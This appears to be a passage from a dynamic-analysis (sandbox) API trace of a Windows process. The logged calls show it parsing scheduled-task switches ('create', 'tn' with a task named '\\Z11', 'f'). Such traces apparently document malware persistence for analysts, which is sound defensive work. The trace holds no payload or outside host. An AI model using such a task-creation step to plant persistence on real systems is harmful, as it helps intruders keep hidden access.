[0220.573] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.573] lstrlenW (lpString="|s|") returned 3
[0220.573] lstrlenW (lpString="|TN|") returned 4
[0220.573] SetLastError (dwErrCode=0x490)
[0220.573] lstrlenW (lpString="u") returned 1
[0220.573] lstrlenW (lpString="u") returned 1
[0220.573] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.573] lstrlenW (lpString="TN") returned 2
[0220.573] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.573] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|u|") returned 3
[0220.573] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.573] lstrlenW (lpString="|u|") returned 3
[0220.573] lstrlenW (lpString="|TN|") returned 4
[0220.573] SetLastError (dwErrCode=0x490)
[0220.574] lstrlenW (lpString="p") returned 1
[0220.574] lstrlenW (lpString="p") returned 1
[0220.574] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.574] lstrlenW (lpString="TN") returned 2
[0220.574] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.574] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|p|") returned 3
[0220.574] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.574] lstrlenW (lpString="|p|") returned 3
[0220.574] lstrlenW (lpString="|TN|") returned 4
[0220.574] SetLastError (dwErrCode=0x490)
[0220.574] lstrlenW (lpString="ru") returned 2
[0220.574] lstrlenW (lpString="ru") returned 2
[0220.574] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.575] lstrlenW (lpString="TN") returned 2
[0220.575] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.575] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ru|") returned 4
[0220.575] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.575] lstrlenW (lpString="|ru|") returned 4
[0220.575] lstrlenW (lpString="|TN|") returned 4
[0220.575] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0
[0220.575] SetLastError (dwErrCode=0x490)
[0220.575] lstrlenW (lpString="rp") returned 2
[0220.575] lstrlenW (lpString="rp") returned 2
[0220.575] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.576] lstrlenW (lpString="TN") returned 2
[0220.576] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.576] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|rp|") returned 4
[0220.576] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.576] lstrlenW (lpString="|rp|") returned 4
[0220.576] lstrlenW (lpString="|TN|") returned 4
[0220.576] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0
[0220.576] SetLastError (dwErrCode=0x490)
[0220.576] lstrlenW (lpString="sc") returned 2
[0220.576] lstrlenW (lpString="sc") returned 2
[0220.576] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.576] lstrlenW (lpString="TN") returned 2
[0220.576] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.577] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|sc|") returned 4
[0220.577] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.577] lstrlenW (lpString="|sc|") returned 4
[0220.577] lstrlenW (lpString="|TN|") returned 4
[0220.577] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0
[0220.577] SetLastError (dwErrCode=0x490)
[0220.577] lstrlenW (lpString="mo") returned 2
[0220.577] lstrlenW (lpString="mo") returned 2
[0220.577] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.577] lstrlenW (lpString="TN") returned 2
[0220.577] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.578] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|mo|") returned 4
[0220.578] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.578] lstrlenW (lpString="|mo|") returned 4
[0220.578] lstrlenW (lpString="|TN|") returned 4
[0220.578] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0
[0220.578] SetLastError (dwErrCode=0x490)
[0220.578] lstrlenW (lpString="d") returned 1
[0220.578] lstrlenW (lpString="d") returned 1
[0220.578] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.578] lstrlenW (lpString="TN") returned 2
[0220.578] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.578] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|d|") returned 3
[0220.579] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.579] lstrlenW (lpString="|d|") returned 3
[0220.579] lstrlenW (lpString="|TN|") returned 4
[0220.579] SetLastError (dwErrCode=0x490)
[0220.579] lstrlenW (lpString="m") returned 1
[0220.579] lstrlenW (lpString="m") returned 1
[0220.579] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.579] lstrlenW (lpString="TN") returned 2
[0220.579] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.579] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|m|") returned 3
[0220.579] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.579] lstrlenW (lpString="|m|") returned 3
[0220.579] lstrlenW (lpString="|TN|") returned 4
[0220.580] SetLastError (dwErrCode=0x490)
[0220.580] lstrlenW (lpString="i") returned 1
[0220.580] lstrlenW (lpString="i") returned 1
[0220.580] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.580] lstrlenW (lpString="TN") returned 2
[0220.580] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.580] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|i|") returned 3
[0220.580] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.580] lstrlenW (lpString="|i|") returned 3
[0220.580] lstrlenW (lpString="|TN|") returned 4
[0220.580] SetLastError (dwErrCode=0x490)
[0220.580] lstrlenW (lpString="tn") returned 2
[0220.581] lstrlenW (lpString="tn") returned 2
[0220.581] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.581] lstrlenW (lpString="TN") returned 2
[0220.581] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.581] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|tn|") returned 4
[0220.581] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.581] lstrlenW (lpString="|tn|") returned 4
[0220.581] lstrlenW (lpString="|TN|") returned 4
[0220.581] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|"
[0220.581] SetLastError (dwErrCode=0x0)
[0220.581] SetLastError (dwErrCode=0x0)
[0220.581] lstrlenW (lpString="\\Z11") returned 4
[0220.582] lstrlenW (lpString="-/") returned 2
[0220.582] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0
[0220.582] SetLastError (dwErrCode=0x490)
[0220.582] SetLastError (dwErrCode=0x490)
[0220.582] SetLastError (dwErrCode=0x0)
[0220.582] lstrlenW (lpString="\\Z11") returned 4
[0220.582] StrChrIW (lpStart="\\Z11", wMatch=0x3a) returned 0x0
[0220.582] SetLastError (dwErrCode=0x490)
[0220.582] SetLastError (dwErrCode=0x0)
[0220.582] lstrlenW (lpString="\\Z11") returned 4
[0220.582] SetLastError (dwErrCode=0x0)
[0220.582] SetLastError (dwErrCode=0x0)
[0220.582] lstrlenW (lpString="/f") returned 2
[0220.582] lstrlenW (lpString="-/") returned 2
[0220.583] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0220.583] lstrlenW (lpString="create") returned 6
[0220.583] lstrlenW (lpString="create") returned 6
[0220.583] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.583] lstrlenW (lpString="f") returned 1
[0220.583] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.583] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|create|") returned 8
[0220.583] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.583] lstrlenW (lpString="|create|") returned 8
[0220.583] lstrlenW (lpString="|f|") returned 3
[0220.584] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0220.584] SetLastError (dwErrCode=0x490)
[0220.584] lstrlenW (lpString="?") returned 1
[0220.584] lstrlenW (lpString="?") returned 1
[0220.584] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.584] lstrlenW (lpString="f") returned 1
[0220.584] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.584] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|?|") returned 3
[0220.584] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.584] lstrlenW (lpString="|?|") returned 3
[0220.584] lstrlenW (lpString="|f|") returned 3
[0220.584] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0220.585] SetLastError (dwErrCode=0x490)
[0220.585] lstrlenW (lpString="s") returned 1
[0220.585] lstrlenW (lpString="s") returned 1
[0220.585] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.585] lstrlenW (lpString="f") returned 1
[0220.585] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.585] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|s|") returned 3
[0220.585] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.585] lstrlenW (lpString="|s|") returned 3
[0220.585] lstrlenW (lpString="|f|") returned 3
[0220.585] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0
[0220.585] SetLastError (dwErrCode=0x490)
[0220.585] lstrlenW (lpString="u") returned 1
[0220.586] lstrlenW (lpString="u") returned 1
[0220.586] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.586] lstrlenW (lpString="f") returned 1
[0220.586] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.586] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|u|") returned 3
[0220.586] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.586] lstrlenW (lpString="|u|") returned 3
[0220.586] lstrlenW (lpString="|f|") returned 3
[0220.586] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0
[0220.586] SetLastError (dwErrCode=0x490)
[0220.586] lstrlenW (lpString="p") returned 1
[0220.586] lstrlenW (lpString="p") returned 1
[0220.587] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.587] lstrlenW (lpString="f") returned 1
[0220.587] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.587] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|p|") returned 3
[0220.587] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.587] lstrlenW (lpString="|p|") returned 3
[0220.587] lstrlenW (lpString="|f|") returned 3
[0220.587] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0
[0220.587] SetLastError (dwErrCode=0x490)
[0220.587] lstrlenW (lpString="ru") returned 2
[0220.587] lstrlenW (lpString="ru") returned 2
[0220.587] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.588] lstrlenW (lpString="f") returned 1
[0220.588] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.588] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ru|") returned 4
[0220.588] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.588] lstrlenW (lpString="|ru|") returned 4
[0220.588] lstrlenW (lpString="|f|") returned 3
[0220.588] StrStrIW (lpFirst="|ru|", lpSrch="|f|") returned 0x0
[0220.588] SetLastError (dwErrCode=0x490)
[0220.588] lstrlenW (lpString="rp") returned 2
[0220.588] lstrlenW (lpString="rp") returned 2
[0220.588] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.589] lstrlenW (lpString="f") returned 1
[0220.589] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.589] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|rp|") returned 4
[0220.589] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.589] lstrlenW (lpString="|rp|") returned 4
[0220.589] lstrlenW (lpString="|f|") returned 3
[0220.589] StrStrIW (lpFirst="|rp|", lpSrch="|f|") returned 0x0
[0220.589] SetLastError (dwErrCode=0x490)
[0220.590] lstrlenW (lpString="sc") returned 2
[0220.590] lstrlenW (lpString="sc") returned 2
[0220.590] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.590] lstrlenW (lpString="f") returned 1
[0220.590] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.590] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|sc|") returned 4
[0220.590] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.590] lstrlenW (lpString="|sc|") returned 4
[0220.590] lstrlenW (lpString="|f|") returned 3
[0220.590] StrStrIW (lpFirst="|sc|", lpSrch="|f|") returned 0x0
[0220.590] SetLastError (dwErrCode=0x490)
[0220.591] lstrlenW (lpString="mo") returned 2
[0220.591] lstrlenW (lpString="mo") returned 2
[0220.591] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.591] lstrlenW (lpString="f") returned 1
[0220.591] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.591] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|mo|") returned 4
[0220.591] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.591] lstrlenW (lpString="|mo|") returned 4
[0220.591] lstrlenW (lpString="|f|") returned 3
[0220.591] StrStrIW (lpFirst="|mo|", lpSrch="|f|") returned 0x0
[0220.591] SetLastError (dwErrCode=0x490)
[0220.591] lstrlenW (lpString="d") returned 1
[0220.592] lstrlenW (lpString="d") returned 1
[0220.592] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.592] lstrlenW (lpString="f") returned 1
[0220.592] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.592] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|d|") returned 3
[0220.592] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.592] lstrlenW (lpString="|d|") returned 3
[0220.592] lstrlenW (lpString="|f|") returned 3
[0220.592] StrStrIW (lpFirst="|d|", lpSrch="|f|") returned 0x0
[0220.592] SetLastError (dwErrCode=0x490)
[0220.592] lstrlenW (lpString="m") returned 1
[0220.592] lstrlenW (lpString="m") returned 1
[0220.593] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.593] lstrlenW (lpString="f") returned 1
[0220.593] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.593] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|m|") returned 3
[0220.593] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.593] lstrlenW (lpString="|m|") returned 3
[0220.593] lstrlenW (lpString="|f|") returned 3
[0220.593] StrStrIW (lpFirst="|m|", lpSrch="|f|") returned 0x0
[0220.593] SetLastError (dwErrCode=0x490)
[0220.593] lstrlenW (lpString="i") returned 1
[0220.593] lstrlenW (lpString="i") returned 1
[0220.593] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.594] lstrlenW (lpString="f") returned 1
[0220.594] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.594] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|i|") returned 3
[0220.594] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.594] lstrlenW (lpString="|i|") returned 3
[0220.594] lstrlenW (lpString="|f|") returned 3
[0220.594] StrStrIW (lpFirst="|i|", lpSrch="|f|") returned 0x0
[0220.594] SetLastError (dwErrCode=0x490)
[0220.594] lstrlenW (lpString="tn") returned 2
[0220.594] lstrlenW (lpString="tn") returned 2
[0220.594] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.594] lstrlenW (lpString="f") returned 1
[0220.595] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.595] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|tn|") returned 4
[0220.595] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.595] lstrlenW (lpString="|tn|") returned 4
[0220.595] lstrlenW (lpString="|f|") returned 3
[0220.595] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0
[0220.595] SetLastError (dwErrCode=0x490)
[0220.595] lstrlenW (lpString="tr") returned 2
[0220.595] lstrlenW (lpString="tr") returned 2
[0220.595] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.595] lstrlenW (lpString="f") returned 1
[0220.595] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.595] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|tr|") returned 4
[0220.596] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.596] lstrlenW (lpString="|tr|") returned 4
[0220.596] lstrlenW (lpString="|f|") returned 3
[0220.596] StrStrIW (lpFirst="|tr|", lpSrch="|f|") returned 0x0
[0220.596] SetLastError (dwErrCode=0x490)
[0220.596] lstrlenW (lpString="st") returned 2
[0220.596] lstrlenW (lpString="st") returned 2
[0220.596] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.596] lstrlenW (lpString="f") returned 1
[0220.596] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.596] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|st|") returned 4
[0220.596] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.596] lstrlenW (lpString="|st|") returned 4
[0220.596] lstrlenW (lpString="|f|") returned 3
[0220.597] StrStrIW (lpFirst="|st|", lpSrch="|f|") returned 0x0
[0220.597] SetLastError (dwErrCode=0x490)
[0220.597] lstrlenW (lpString="sd") returned 2
[0220.597] lstrlenW (lpString="sd") returned 2
[0220.597] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.597] lstrlenW (lpString="f") returned 1
[0220.597] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.597] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|sd|") returned 4
[0220.597] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.597] lstrlenW (lpString="|sd|") returned 4
[0220.597] lstrlenW (lpString="|f|") returned 3
[0220.597] StrStrIW (lpFirst="|sd|", lpSrch="|f|") returned 0x0
[0220.597] SetLastError (dwErrCode=0x490)
[0220.597] lstrlenW (lpString="ed") returned 2
[0220.598] lstrlenW (lpString="ed") returned 2
[0220.598] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.598] lstrlenW (lpString="f") returned 1
[0220.598] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.598] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ed|") returned 4
[0220.598] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.598] lstrlenW (lpString="|ed|") returned 4
[0220.598] lstrlenW (lpString="|f|") returned 3
[0220.598] StrStrIW (lpFirst="|ed|", lpSrch="|f|") returned 0x0
[0220.598] SetLastError (dwErrCode=0x490)
[0220.598] lstrlenW (lpString="it") returned 2
[0220.598] lstrlenW (lpString="it") returned 2
[0220.598] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.598] lstrlenW (lpString="f") returned 1
[0220.599] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.599] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|it|") returned 4
[0220.599] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.599] lstrlenW (lpString="|it|") returned 4
[0220.599] lstrlenW (lpString="|f|") returned 3
[0220.599] StrStrIW (lpFirst="|it|", lpSrch="|f|") returned 0x0
[0220.599] SetLastError (dwErrCode=0x490)
[0220.599] lstrlenW (lpString="et") returned 2
[0220.599] lstrlenW (lpString="et") returned 2
[0220.599] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.599] lstrlenW (lpString="f") returned 1
[0220.599] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.599] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|et|") returned 4
[0220.599] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.600] lstrlenW (lpString="|et|") returned 4
[0220.600] lstrlenW (lpString="|f|") returned 3
[0220.600] StrStrIW (lpFirst="|et|", lpSrch="|f|") returned 0x0
[0220.600] SetLastError (dwErrCode=0x490)
[0220.600] lstrlenW (lpString="k") returned 1
[0220.600] lstrlenW (lpString="k") returned 1
[0220.600] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.600] lstrlenW (lpString="f") returned 1
[0220.600] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.600] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|k|") returned 3
[0220.600] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.600] lstrlenW (lpString="|k|") returned 3
[0220.600] lstrlenW (lpString="|f|") returned 3
[0220.600] StrStrIW (lpFirst="|k|", lpSrch="|f|") returned 0x0
[0220.601] SetLastError (dwErrCode=0x490)
[0220.601] lstrlenW (lpString="du") returned 2
[0220.601] lstrlenW (lpString="du") returned 2
[0220.601] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.601] lstrlenW (lpString="f") returned 1
[0220.601] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.601] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|du|") returned 4
[0220.601] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.601] lstrlenW (lpString="|du|") returned 4
[0220.601] lstrlenW (lpString="|f|") returned 3
[0220.601] StrStrIW (lpFirst="|du|", lpSrch="|f|") returned 0x0
[0220.601] SetLastError (dwErrCode=0x490)
[0220.601] lstrlenW (lpString="ri") returned 2
[0220.603] lstrlenW (lpString="ri") returned 2
[0220.603] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.603] lstrlenW (lpString="f") returned 1
[0220.603] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.604] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ri|") returned 4
[0220.604] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.604] lstrlenW (lpString="|ri|") returned 4
[0220.604] lstrlenW (lpString="|f|") returned 3
